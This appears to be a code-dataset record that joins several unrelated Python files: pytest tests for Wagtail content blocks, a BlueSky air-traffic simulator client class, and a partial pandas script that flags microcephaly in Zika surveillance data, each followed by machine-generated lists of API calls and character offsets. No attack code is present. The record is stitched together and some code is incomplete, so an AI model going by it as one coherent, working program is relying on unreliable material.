from phonenumber_field.phonenumber import PhoneNumber
from wagtail.core.models import Page
from wagtail_extensions.blocks import (
DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock
)
@pytest.mark.django_db
@pytest.fixture
def page():
# Homepage is created by Wagtail's initial migrations
# But let's create our own child page for testing with.
homepage = Page.objects.get(url_path='/home/')
page = Page(title='A test page', slug="test")
homepage.add_child(instance=page)
return page
def test_department_block_clean_invalid():
department = DepartmentBlock()
with pytest.raises(ValidationError):
department.clean({})
def test_department_block_clean_valid_with_both():
department = DepartmentBlock()
department.clean({'name':'Test', 'email':'<EMAIL>', 'phones': ['+447528712345']})
def test_department_block_to_python_empty():
department = DepartmentBlock()
department.to_python({})
def test_department_block_to_python_strip_empty_phonenumbers():
department = DepartmentBlock()
value = department.get_prep_value({'phones': ['', '+447528712345', '']})
assert value['phones'] == ['+447528712345']
def test_link_block_with_url():
block = LinkBlock()
value = block.to_python({
'link': [{'type': 'url', 'value': '/hello/'}]
})
assert value.link_url == '/hello/'
assert value.link_text == '/hello/'
def test_link_block_with_url_and_text():
block = LinkBlock()
value = block.to_python({
'text': 'Hello World',
'link': [{'type': 'url', 'value': '/hello/'}]
})
assert value.link_url == '/hello/'
assert value.link_text == 'Hello World'
def test_link_block_with_empty_string_text():
block = LinkBlock()
value = block.to_python({
'text': '',
'link': [{'type': 'url', 'value': '/hello/'}]
})
assert value.link_url == '/hello/'
assert value.link_text == '/hello/'
def test_link_block_with_missing_streamblock():
block = LinkBlock()
value = block.to_python({
'text': '',
'link': []
})
assert value.link_url == ''
assert value.link_text == ''
@pytest.mark.django_db
def test_link_block_with_page(page):
block = LinkBlock()
value = block.to_python({
'link': [{'type': 'page', 'value': page.pk}]
})
assert value.link_url == page.url
assert value.link_text == page.title
@pytest.mark.django_db
def test_link_block_with_page_that_no_longer_exists(page):
"""
If a page referenced by a PageChooserBlock has been deleted, the block value will be None.
"""
block = LinkBlock()
value = block.to_python({
'link': [{'type': 'page', 'value': None}]
})
assert value.link_url == ''
assert value.link_text == ''
@pytest.mark.django_db
def test_link_block_with_page_and_text(page):
block = LinkBlock()
value = block.to_python({
'text': '<NAME>',
'link': [{'type': 'page', 'value': page.pk}]
})
assert value.link_url == page.url
assert value.link_text == 'Hello World'
def test_link_block_clean_for_required():
block = LinkBlock()
value = block.to_python({
'text': 'Hello World',
'link': [] # This must not be empty if the field is required
})
with pytest.raises(ValidationError):
block.clean(value)
def test_link_block_clean_for_not_required():
block = LinkBlock(required=False)
value = block.to_python({
'text': '<NAME>',
'link': [] # Can be empty if the field is not required
})
# This should not raise an exception
block.clean(value)
@freeze_time("2017-01-01")
def test_openingtime_block_clean_date_in_past():
openingtime = OpeningTimeBlock()
with pytest.raises(ValidationError):
openingtime.clean({'date': '2016-01-01'})
def test_openingtime_block_clean_end_before_start():
openingtime = OpeningTimeBlock()
with pytest.raises(ValidationError):
openingtime.clean({'start': '20:00', 'end': '08:00', 'weekday': '1'})
def test_openingtime_block_clean_no_weekday_or_date():
openingtime = OpeningTimeBlock()
with pytest.raises(ValidationError):
openingtime.clean({'start': '20:00', 'end': '08:00'})
@freeze_time("2017-01-01")
def test_openingtime_block_clean_valid():
openingtime = OpeningTimeBlock()
openingtime.clean({'start': '08:00', 'end': '20:00', 'date': '2017-01-01'})
def test_openingtime_block_to_python_empty():
openingtime = OpeningTimeBlock()
openingtime.to_python({'label': '', 'date': None, 'closed': False, 'start': None, 'end': None, 'weekday': ''})
# Pass without error
def test_openingtime_block_to_python_cast_weekday():
openingtime = OpeningTimeBlock()
value = openingtime.to_python({'weekday': '5'})
assert value['weekday'] == 5
def test_openingtime_block_to_python_public_label():
openingtime = OpeningTimeBlock()
value = openingtime.to_python({'weekday': '7'})
assert value['label'] == OpeningTimeBlock.PUBLIC_LABEL
def test_openingtime_block_to_python_public_with_label():
openingtime = OpeningTimeBlock()
label = 'Easter sunday'
value = openingtime.to_python({'weekday': '7', 'label': label})
assert value['label'] == label
def test_openingtime_block_single_date_empty():
assert OpeningTimeBlock.single_date({}) == False
def test_openingtime_block_single_date_with_date():
assert OpeningTimeBlock.single_date({'date': 'some date'}) == True
def test_openingtime_block_single_date_public():
assert OpeningTimeBlock.single_date({'weekday': 7}) == True
def test_openingtime_block_next_date_empty():
assert OpeningTimeBlock.next_date({}) is None
@freeze_time("2017-12-13")
def test_openingtime_block_next_date_today():
assert OpeningTimeBlock.next_date({'weekday': 2}) == datetime.date(2017, 12, 13)
@freeze_time("2017-12-13")
def test_openingtime_block_next_date_sunday():
assert OpeningTimeBlock.next_date({'weekday': 6}) == datetime.date(2017, 12, 17)
@freeze_time("2017-12-13")
def test_openingtime_block_next_date_public():
assert OpeningTimeBlock.next_date({'weekday': 7}) is None
def test_openingtimes_block_time_keyfunc_specific():
openingtime = OpeningTimeBlock()
value = openingtime.to_python({})
with patch.object(openingtime, 'single_date', return_value=True):
out = OpeningTimesBlock.time_keyfunc(value)
assert out is value
def test_openingtimes_block_time_keyfunc_non_specific():
value = OpeningTimeBlock().to_python({'closed': False, 'start': '5:00', 'end': '10:00'})
out = OpeningTimesBlock.time_keyfunc(value)
assert out == (False, datetime.time(5), datetime.time(10))
@patch('wagtail_extensions.blocks.groupby')
def test_openingtimes_block_group_times(mocked_groupby):
value = {}
mocked_groupby.return_value = [('first', [1, 4, 5]), ('second', [7, 10])]
out = OpeningTimesBlock.group_times(value)
assert out == [[1, 4, 5], [7, 10]]
mocked_groupby.assert_called_once_with(value, OpeningTimesBlock.time_keyfunc)
def test_openingtimes_block_get_time_for_date_empty():
assert OpeningTimesBlock.get_time_for_date(None, None) is None
def test_openingtimes_block_get_time_for_date_no_times():
assert OpeningTimesBlock.get_time_for_date({}, datetime.date(2017, 12, 10)) is None
def test_openingtimes_block_get_time_for_date_times_date():
match = {'date': datetime.date(2017, 12, 10)}
value = {
'times': [
{'weekday': 4},
match,
],
}
assert OpeningTimesBlock.get_time_for_date(value, datetime.date(2017, 12, 10)) == match
def test_openingtimes_block_get_time_for_date_times_weekday():
match = {'weekday': 6}
value = {
'times': [
{'weekday': 4},
{'date': datetime.date(2017, 12, 10)},
match,
],
}
assert OpeningTimesBlock.get_time_for_date(value, datetime.date(2017, 12, 17)) == match
def test_openingtimes_block_get_time_for_date_times_no_match():
value = {
'times': [
{'weekday': 4},
{'date': datetime.date(2017, 12, 10)},
{'weekday': 2},
],
}
assert OpeningTimesBlock.get_time_for_date(value, datetime.date(2017, 12, 17)) is None
@freeze_time('2017-06-28')
def test_openingtimes_block_opening_today():
openingtimes = OpeningTimesBlock
with patch.object(openingtimes, 'get_time_for_date') as mocked_get:
value = 'test'
out = openingtimes.opening_today(value)
mocked_get.assert_called_once_with(value, datetime.date(2017, 6, 28))
assert out == mocked_get.return_value
def test_openingtimes_block_get_context():
openingtimes = OpeningTimesBlock()
value = {'times': [1, 5, 10]}
with patch.object(openingtimes, 'group_times') as mocked_group,\
patch.object(openingtimes, 'opening_today') as mocked_today:
ctx = openingtimes.get_context(value)
mocked_group.assert_called_once_with([1, 5, 10])
mocked_today.assert_called_once_with(value)
assert ctx['times'] == mocked_group.return_value
assert ctx['today'] == mocked_today.return_value
def test_phone_block_get_prep_value():
phone = PhoneBlock()
number = PhoneNumber.from_string('+447528712345')
number_str = phone.get_prep_value(number)
assert number_str == '+447528712345'
def test_phone_block_to_python():
phone = PhoneBlock()
number = phone.to_python('+447528712345')
assert number == PhoneNumber.from_string('+447528712345')
def test_phone_block_to_python_empty():
phone = PhoneBlock()
assert phone.to_python('') == ''
def test_images_block_get_context():
block = ImagesBlock()
assert block.get_context({'images': ['an image', 'another image', 'yet another image']})['column_width'] == 4
def test_images_block_get_context_empty_list():
block = ImagesBlock()
assert block.get_context({})['column_width'] == 12
| [
"wagtail.core.models.Page",
"wagtail_extensions.blocks.OpeningTimeBlock",
"wagtail_extensions.blocks.OpeningTimesBlock.time_keyfunc",
"wagtail_extensions.blocks.OpeningTimesBlock",
"datetime.time",
"wagtail_extensions.blocks.OpeningTimesBlock.group_times",
"wagtail.core.models.Page.objects.get",
"unittest.mock.patch.object",
"wagtail_extensions.blocks.ImagesBlock",
"pytest.raises",
"wagtail_extensions.blocks.OpeningTimeBlock.next_date",
"phonenumber_field.phonenumber.PhoneNumber.from_string",
"wagtail_extensions.blocks.OpeningTimesBlock.get_time_for_date",
"datetime.date",
"unittest.mock.patch",
"wagtail_extensions.blocks.OpeningTimeBlock.single_date",
"wagtail_extensions.blocks.PhoneBlock",
"wagtail_extensions.blocks.DepartmentBlock",
"wagtail_extensions.blocks.LinkBlock",
"freezegun.freeze_time"
] | [((3823, 3848), 'freezegun.freeze_time', 'freeze_time', (['"""2017-01-01"""'], {}), "('2017-01-01')\n", (3834, 3848), False, 'from freezegun import freeze_time\n'), ((4437, 4462), 'freezegun.freeze_time', 'freeze_time', (['"""2017-01-01"""'], {}), "('2017-01-01')\n", (4448, 4462), False, 'from freezegun import freeze_time\n'), ((5899, 5924), 'freezegun.freeze_time', 'freeze_time', (['"""2017-12-13"""'], {}), "('2017-12-13')\n", (5910, 5924), False, 'from freezegun import freeze_time\n'), ((6059, 6084), 'freezegun.freeze_time', 'freeze_time', (['"""2017-12-13"""'], {}), "('2017-12-13')\n", (6070, 6084), False, 'from freezegun import freeze_time\n'), ((6220, 6245), 'freezegun.freeze_time', 'freeze_time', (['"""2017-12-13"""'], {}), "('2017-12-13')\n", (6231, 6245), False, 'from freezegun import freeze_time\n'), ((6897, 6939), 'unittest.mock.patch', 'patch', (['"""wagtail_extensions.blocks.groupby"""'], {}), "('wagtail_extensions.blocks.groupby')\n", (6902, 6939), False, 'from unittest.mock import patch\n'), ((8481, 8506), 'freezegun.freeze_time', 'freeze_time', (['"""2017-06-28"""'], {}), "('2017-06-28')\n", (8492, 8506), False, 'from freezegun import freeze_time\n'), ((561, 596), 'wagtail.core.models.Page.objects.get', 'Page.objects.get', ([], {'url_path': '"""/home/"""'}), "(url_path='/home/')\n", (577, 596), False, 'from wagtail.core.models import Page\n'), ((608, 646), 'wagtail.core.models.Page', 'Page', ([], {'title': '"""A test page"""', 'slug': '"""test"""'}), "(title='A test page', slug='test')\n", (612, 646), False, 'from wagtail.core.models import Page\n'), ((763, 780), 'wagtail_extensions.blocks.DepartmentBlock', 'DepartmentBlock', ([], {}), '()\n', (778, 780), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((921, 938), 'wagtail_extensions.blocks.DepartmentBlock', 'DepartmentBlock', ([], {}), '()\n', (936, 938), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1089, 1106), 'wagtail_extensions.blocks.DepartmentBlock', 'DepartmentBlock', ([], {}), '()\n', (1104, 1106), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1219, 1236), 'wagtail_extensions.blocks.DepartmentBlock', 'DepartmentBlock', ([], {}), '()\n', (1234, 1236), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1408, 1419), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (1417, 1419), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1646, 1657), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (1655, 1657), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((1923, 1934), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (1932, 1934), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((2187, 2198), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (2196, 2198), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((2414, 2425), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (2423, 2425), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((2803, 2814), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (2812, 2814), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((3051, 3062), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (3060, 3062), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((3317, 3328), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {}), '()\n', (3326, 3328), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((3599, 3624), 'wagtail_extensions.blocks.LinkBlock', 'LinkBlock', ([], {'required': '(False)'}), '(required=False)\n', (3608, 3624), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((3916, 3934), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (3932, 3934), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4099, 4117), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4115, 4117), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4312, 4330), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4328, 4330), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4523, 4541), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4539, 4541), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4688, 4706), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4704, 4706), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((4920, 4938), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (4936, 4938), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5097, 5115), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (5113, 5115), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5305, 5323), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (5321, 5323), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6428, 6446), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (6444, 6446), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6793, 6830), 'wagtail_extensions.blocks.OpeningTimesBlock.time_keyfunc', 'OpeningTimesBlock.time_keyfunc', (['value'], {}), '(value)\n', (6823, 6830), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((7100, 7136), 'wagtail_extensions.blocks.OpeningTimesBlock.group_times', 'OpeningTimesBlock.group_times', (['value'], {}), '(value)\n', (7129, 7136), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((8920, 8939), 'wagtail_extensions.blocks.OpeningTimesBlock', 'OpeningTimesBlock', ([], {}), '()\n', (8937, 8939), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((9436, 9448), 'wagtail_extensions.blocks.PhoneBlock', 'PhoneBlock', ([], {}), '()\n', (9446, 9448), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((9462, 9502), 'phonenumber_field.phonenumber.PhoneNumber.from_string', 'PhoneNumber.from_string', (['"""+447528712345"""'], {}), "('+447528712345')\n", (9485, 9502), False, 'from phonenumber_field.phonenumber import PhoneNumber\n'), ((9638, 9650), 'wagtail_extensions.blocks.PhoneBlock', 'PhoneBlock', ([], {}), '()\n', (9648, 9650), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((9813, 9825), 'wagtail_extensions.blocks.PhoneBlock', 'PhoneBlock', ([], {}), '()\n', (9823, 9825), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((9914, 9927), 'wagtail_extensions.blocks.ImagesBlock', 'ImagesBlock', ([], {}), '()\n', (9925, 9927), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((10104, 10117), 'wagtail_extensions.blocks.ImagesBlock', 'ImagesBlock', ([], {}), '()\n', (10115, 10117), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((790, 820), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (803, 820), False, 'import pytest\n'), ((3480, 3510), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (3493, 3510), False, 'import pytest\n'), ((3944, 3974), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (3957, 3974), False, 'import pytest\n'), ((4127, 4157), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (4140, 4157), False, 'import pytest\n'), ((4340, 4370), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (4353, 4370), False, 'import pytest\n'), ((5516, 5548), 'wagtail_extensions.blocks.OpeningTimeBlock.single_date', 'OpeningTimeBlock.single_date', (['{}'], {}), '({})\n', (5544, 5548), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5623, 5674), 'wagtail_extensions.blocks.OpeningTimeBlock.single_date', 'OpeningTimeBlock.single_date', (["{'date': 'some date'}"], {}), "({'date': 'some date'})\n", (5651, 5674), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5745, 5789), 'wagtail_extensions.blocks.OpeningTimeBlock.single_date', 'OpeningTimeBlock.single_date', (["{'weekday': 7}"], {}), "({'weekday': 7})\n", (5773, 5789), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5857, 5887), 'wagtail_extensions.blocks.OpeningTimeBlock.next_date', 'OpeningTimeBlock.next_date', (['{}'], {}), '({})\n', (5883, 5887), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((5982, 6024), 'wagtail_extensions.blocks.OpeningTimeBlock.next_date', 'OpeningTimeBlock.next_date', (["{'weekday': 2}"], {}), "({'weekday': 2})\n", (6008, 6024), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6028, 6055), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(13)'], {}), '(2017, 12, 13)\n', (6041, 6055), False, 'import datetime\n'), ((6143, 6185), 'wagtail_extensions.blocks.OpeningTimeBlock.next_date', 'OpeningTimeBlock.next_date', (["{'weekday': 6}"], {}), "({'weekday': 6})\n", (6169, 6185), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6189, 6216), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(17)'], {}), '(2017, 12, 17)\n', (6202, 6216), False, 'import datetime\n'), ((6304, 6346), 'wagtail_extensions.blocks.OpeningTimeBlock.next_date', 'OpeningTimeBlock.next_date', (["{'weekday': 7}"], {}), "({'weekday': 7})\n", (6330, 6346), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6494, 6553), 'unittest.mock.patch.object', 'patch.object', (['openingtime', '"""single_date"""'], {'return_value': '(True)'}), "(openingtime, 'single_date', return_value=True)\n", (6506, 6553), False, 'from unittest.mock import patch\n'), ((6569, 6606), 'wagtail_extensions.blocks.OpeningTimesBlock.time_keyfunc', 'OpeningTimesBlock.time_keyfunc', (['value'], {}), '(value)\n', (6599, 6606), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((7327, 7374), 'wagtail_extensions.blocks.OpeningTimesBlock.get_time_for_date', 'OpeningTimesBlock.get_time_for_date', (['None', 'None'], {}), '(None, None)\n', (7362, 7374), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((7614, 7641), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (7627, 7641), False, 'import datetime\n'), ((8598, 8645), 'unittest.mock.patch.object', 'patch.object', (['openingtimes', '"""get_time_for_date"""'], {}), "(openingtimes, 'get_time_for_date')\n", (8610, 8645), False, 'from unittest.mock import patch\n'), ((8983, 9024), 'unittest.mock.patch.object', 'patch.object', (['openingtimes', '"""group_times"""'], {}), "(openingtimes, 'group_times')\n", (8995, 9024), False, 'from unittest.mock import patch\n'), ((9053, 9096), 'unittest.mock.patch.object', 'patch.object', (['openingtimes', '"""opening_today"""'], {}), "(openingtimes, 'opening_today')\n", (9065, 9096), False, 'from unittest.mock import patch\n'), ((9718, 9758), 'phonenumber_field.phonenumber.PhoneNumber.from_string', 'PhoneNumber.from_string', (['"""+447528712345"""'], {}), "('+447528712345')\n", (9741, 9758), False, 'from phonenumber_field.phonenumber import PhoneNumber\n'), ((6702, 6720), 'wagtail_extensions.blocks.OpeningTimeBlock', 'OpeningTimeBlock', ([], {}), '()\n', (6718, 6720), False, 'from wagtail_extensions.blocks import DepartmentBlock, ImagesBlock, LinkBlock, OpeningTimeBlock, OpeningTimesBlock, PhoneBlock\n'), ((6857, 6873), 'datetime.time', 'datetime.time', (['(5)'], {}), '(5)\n', (6870, 6873), False, 'import datetime\n'), ((6875, 6892), 'datetime.time', 'datetime.time', (['(10)'], {}), '(10)\n', (6888, 6892), False, 'import datetime\n'), ((7494, 7521), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (7507, 7521), False, 'import datetime\n'), ((7794, 7821), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (7807, 7821), False, 'import datetime\n'), ((8126, 8153), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(17)'], {}), '(2017, 12, 17)\n', (8139, 8153), False, 'import datetime\n'), ((8441, 8468), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(17)'], {}), '(2017, 12, 17)\n', (8454, 8468), False, 'import datetime\n'), ((8782, 8808), 'datetime.date', 'datetime.date', (['(2017)', '(6)', '(28)'], {}), '(2017, 6, 28)\n', (8795, 8808), False, 'import datetime\n'), ((8006, 8033), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (8019, 8033), False, 'import datetime\n'), ((8312, 8339), 'datetime.date', 'datetime.date', (['(2017)', '(12)', '(10)'], {}), '(2017, 12, 10)\n', (8325, 8339), False, 'import datetime\n')] |
"""
BlueSky simulation client class
"""
# TODO: Need to re-add the tests for string parsing/units from the old API tests
import os
from typing import List
from semver import VersionInfo
from .bluesky_aircraft_controls import BlueSkyAircraftControls
from .bluesky_simulator_controls import BlueSkySimulatorControls
from bluebird.settings import Settings
from bluebird.sim_client.bluesky.bluesky_client import BlueSkyClient
from bluebird.utils.abstract_sim_client import AbstractSimClient
from bluebird.utils.timer import Timer
_BS_MIN_VERSION = os.getenv("BS_MIN_VERSION")
if not _BS_MIN_VERSION:
raise ValueError("The BS_MIN_VERSION environment variable must be set")
MIN_SIM_VERSION = VersionInfo.parse(_BS_MIN_VERSION)
# TODO Check cases where we need this
def _assert_valid_args(args: list):
"""
Since BlueSky only accepts commands in the form of (variable-length) strings, we
need to check the arguments for each command string we construct before sending it
"""
# Probably a cleaner way of doing this...
assert all(
x and not x.isspace() and x != "None" for x in map(str, args)
), f"Invalid argument in : {args}"
class SimClient(AbstractSimClient):
"""AbstractSimClient implementation for BlueSky"""
@property
def aircraft(self) -> BlueSkyAircraftControls:
return self._aircraft_controls
@property
def simulation(self) -> BlueSkySimulatorControls:
return self._sim_controls
@property
def sim_version(self) -> VersionInfo:
return self._client.host_version
def __init__(self, **kwargs):
self._client = BlueSkyClient()
self._aircraft_controls = BlueSkyAircraftControls(self._client)
self._sim_controls = BlueSkySimulatorControls(self._client)
def start_timers(self) -> List[Timer]:
return self._client.start_timers()
def connect(self, timeout=1) -> None:
self._client.connect(
Settings.SIM_HOST,
event_port=Settings.BS_EVENT_PORT,
stream_port=Settings.BS_STREAM_PORT,
timeout=timeout,
)
def shutdown(self, shutdown_sim: bool = False) -> bool:
self._client.stop()
return True
| [
"bluebird.sim_client.bluesky.bluesky_client.BlueSkyClient",
"os.getenv",
"semver.VersionInfo.parse"
] | [((548, 575), 'os.getenv', 'os.getenv', (['"""BS_MIN_VERSION"""'], {}), "('BS_MIN_VERSION')\n", (557, 575), False, 'import os\n'), ((695, 729), 'semver.VersionInfo.parse', 'VersionInfo.parse', (['_BS_MIN_VERSION'], {}), '(_BS_MIN_VERSION)\n', (712, 729), False, 'from semver import VersionInfo\n'), ((1623, 1638), 'bluebird.sim_client.bluesky.bluesky_client.BlueSkyClient', 'BlueSkyClient', ([], {}), '()\n', (1636, 1638), False, 'from bluebird.sim_client.bluesky.bluesky_client import BlueSkyClient\n')] |
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 27 08:49:21 2020
@author: rafae
"""
import pandas as pd
import numpy as np
def gerarbanco():
banco = pd.read_stata("Microcefalia MS analysis 20160609.dta")
circ = pd.read_csv("circumference.csv",sep=";",index_col='sem')
banco.index = range(len(banco.index))
bancoNovo = pd.DataFrame()
banco.NV_USG_RESULT.replace( ['ALTERADO','NORMAL'],['Alterado','Normal'],inplace=True)
# rule classification
sexo = banco.TP_SEXO
classFinal = pd.Series([np.nan]*len(sexo))
classFinal[banco.NV_CMV=='IgM reagente'] = 'Discarded'
classFinal[banco.NV_HCV=='Reagente'] = 'Discarded'
classFinal[banco.NV_RUBEOLA=='IgM reagente'] = 'Discarded'
classFinal[banco.NV_TOXO=='IgM reagente'] = 'Discarded'
classFinal[banco.NV_RM_RESULT=='Normal'] = 'Discarded'
classFinal[banco.NV_TC_RESULT=='Normal'] = 'Discarded'
classFinal[banco.NV_ZIKA=='Positivo'] = 'Definite'
# organize database
tamanhoCabe = banco.headcirc
bancoNovo['sexo'] = list(sexo)
bancoNovo['tamanhoCabe'] = list(tamanhoCabe)
bancoNovo['classFeto'] = list(banco.TP_CLASSIFICACAO_FETO_RN)
semanaGes = banco.SINASC_SEMAGESTAC
missing = pd.Series([np.nan]*len(sexo))
missing[bancoNovo.tamanhoCabe.isnull()]=1
missing[sexo.isnull()]=1
missing[bancoNovo.classFeto.isnull()]=1
missing[semanaGes.isnull()]=1
micro = pd.Series([np.nan]*len(sexo))
for i in range(len(sexo)):
if missing[i]!=1:
if semanaGes[i]<=42 and semanaGes[i]>=14:
ref1 =0
if sexo[i]=='Masculino':
ref1 = circ.boy_min[semanaGes[i]]
else:
ref1 = circ.girl_min[semanaGes[i]]
if tamanhoCabe[i]<ref1:
micro[i]=1
else:
micro[i]=0
